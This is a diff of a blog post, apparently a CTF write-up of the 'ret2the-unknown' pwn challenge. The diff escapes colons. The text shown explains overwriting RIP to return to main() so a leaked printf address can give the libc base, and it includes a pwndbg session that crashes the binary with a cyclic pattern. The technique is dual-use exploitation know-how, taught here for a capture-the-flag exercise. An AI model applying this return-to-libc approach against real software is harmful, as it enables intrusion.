SoumyaEXE/soumya.github.io/_posts/2021-07-31-Ret2TheUnknown.markdown

 ### GDB

 Thus, to correctly calculate the libc base address, it is essential to overwrite RIP to point to main() so that the binary allows us to input a second payload (this time with the knowledge of the printf address).
-First, the offset of RIP must be calculated:
+First, the offset of RIP must be calculated\:

 {% highlight bash %}
 ┌─[0xd4y@Writeup]─[~/business/ctf/redpwn/pwn/ret2the-unknown]
 └──╼ $gdb ./ret2the-unknown -q
-pwndbg: loaded 196 commands.
+pwndbg\: loaded 196 commands.
 Type pwndbg [filter] for a list.
-pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
+pwndbg\: created $rebase, $ida gdb functions (can be used with print/break)
 Reading symbols from ./ret2the-unknown...
 (No debugging symbols found in ./ret2the-unknown)
 pwndbg> r < <(cyclic 100)
-Starting program: /home/0xd4y/business/ctf/redpwn/pwn/ret2the-unknown/ret2the-unknown < <(cyclic 100)
+Starting program\: /home/0xd4y/business/ctf/redpwn/pwn/ret2the-unknown/ret2the-unknown < <(cyclic 100)
 that board meeting was a *smashing* success! rob loved the challenge!
 in fact, he loved it so much he sponsored me a business trip to this place called 'libc'...
 where is this place? can you help me get there safely?
 phew, good to know. shoot! i forgot!
-rob said i'd need this to get there: 7ffff7e44cf0
+rob said i'd need this to get there\: 7ffff7e44cf0
 good luck!

 Program received signal SIGSEGV, Segmentation fault.